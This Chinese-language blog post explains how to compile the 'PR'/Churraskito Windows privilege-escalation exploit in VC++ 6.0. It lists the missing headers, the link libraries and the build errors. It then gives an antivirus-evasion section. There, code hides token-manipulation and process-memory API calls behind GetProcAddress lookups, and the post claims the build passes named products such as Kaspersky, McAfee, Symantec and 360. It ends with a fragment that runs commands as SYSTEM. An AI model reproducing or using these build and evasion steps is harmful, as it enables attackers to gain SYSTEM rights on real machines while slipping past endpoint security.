网络安全：PR Source code Build & to avoid killing

网络安全：PR Source code Build & to avoid killing

这里源码是暗组上面提供的KOOPie写的pr    这些利用工具源码都是vs 2003，编译的环境和vc不太一样，因此，在编译的时候会出现这样那样的问题    下面我们就以vc++6.0来编译pr。       环境：vc++6.0    缺少的文件：sshwbemhelpers.h(2003服务器特有的)，所以需要我们到网上下载 覆盖到 X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h      e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory stdafx.cpp    e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory     执行 cl.exe 时出错.      工程设置：    Project Settings -->Links-->对象/库模块后面添加以下几个类库，否则会出现下面几种错误    psapi.lib wsock32.lib Ws2_32.lib，xolehlp.lib        d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma    d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma    stdafx.cpp    Linking...        Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16        Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16        Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12        Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4        Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4        Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12        Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24        Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8        Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals       *******************************************免杀**********************************************   nod32: LookupAccountSid DuplicateTokenEx   typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)   (     __in_opt LPCSTR lpSystemName,     __in PSID Sid,     __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,     __inout  LPDWORD cchName,     __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName,     __out PSID_NAME_USE peUse );   LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");   typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)   (     __in        HANDLE hExistingToken,     __in        DWORD dwDesiredAccess,     __in_opt    LPSECURITY_ATTRIBUTES lpTokenAttributes,     __in        SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,     __in        TOKEN_TYPE TokenType,     __deref_out PHANDLE phNewToken ); DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");     kaspersky：过   Avira AntiVir ：过   mcafee： 过   AVG：  过   symantec企业版：过   Norton AntiVirus：过   360全套：过   金山毒霸全套：   typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)   (     __in  HANDLE hProcess,     __in  LPVOID lpAddress,     __in  SIZE_T dwSize,     __in  DWORD flNewProtect,     __out PDWORD lpflOldProtect ); VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");   typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)   (     __in      HANDLE hProcess,     __in      LPVOID lpBaseAddress,     __in_bcount(nSize) LPCVOID lpBuffer,     __in      SIZE_T nSize,     __out_opt SIZE_T * lpNumberOfBytesWritten ); WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");   typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT) (     __in      HANDLE TokenHandle,     __in      TOKEN_INFORMATION_CLASS TokenInformationClass,     __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,     __in      DWORD TokenInformationLength,     __out_opt PDWORD ReturnLength );   GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");   金山主动防御能过，金山杀毒扫描能出来，但是执行不提示，杀下面的两个自定义函数 ： DelRegistrySubkeys和(RunCommandAsSystem   DelRegistrySubkeys(); printf ("/xxoo/-->Running command with SYSTEM Token...\n"); if (RunCommandAsSystem(hTokenOut, lpCommand)) {    printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");    return 0; }

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。